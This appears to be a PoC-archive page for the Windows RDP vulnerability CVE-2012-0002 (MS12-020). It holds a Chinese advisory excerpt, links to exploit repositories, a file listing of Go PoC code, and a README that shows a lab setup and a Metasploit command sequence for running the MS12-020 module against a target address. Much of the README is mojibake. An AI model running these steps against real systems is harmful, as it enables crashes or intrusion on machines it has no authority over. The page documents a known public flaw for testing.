Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2012-0002 PoC — Microsoft Windows远程桌面协议代码执行漏洞

Source
Associated Vulnerability
Title:Microsoft Windows远程桌面协议代码执行漏洞 (CVE-2012-0002)
Description:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。 方法三:在运行 Windows Vista、Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的受支持版本的系统上启用网络级别身份验证。
Readme
>https://github.com/xiaoxiaoleo/windows-kernel-exploits/blob/2892a653297ccbbab8b2690cf7c9e302d7ffe03f/MS12-020
>https://max.book118.com/html/2016/0314/37644373.shtm
>https://github.com/JYanger/MS12-020-Check/blob/master/ms12-020_one.py
>https://blog.csdn.net/qq_73252299/article/details/133156450

���ص�Windows XP Home Service Pack 2 �汾�� Windows XP��ͥ�棬û��Զ������Ĺ��ܡ�profession�汾�� </n>
</br>�ҵĵ���->����->Զ��
![���������ͼƬ����](https://img-blog.csdnimg.cn/direct/2d657a821a4b48b1b1b94c0b098f7b48.png)
</br>û��Զ������ѡ��

����Windows server 2008 R2
![���������ͼƬ����](https://img-blog.csdnimg.cn/direct/8e89e3ad2f3248a5bea3ac3817b3cf7a.png)
˳�ְѷ���ǽ����

```
msfconsole
search ms12-020  ##����MS12-020©�����
use 0 
show options  
set rhosts 192.158.18.143 
run 
```
![���������ͼƬ����](https://img-blog.csdnimg.cn/direct/f60d7b6f0ecd4581880dc778e6a411d6.png)
File Snapshot

[4.0K] /data/pocs/13a5763757a46eeca7ec3020028871650db466be ├── [3.4K] MS12-020.go ├── [ 159] MS12-020_test.go └── [ 893] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.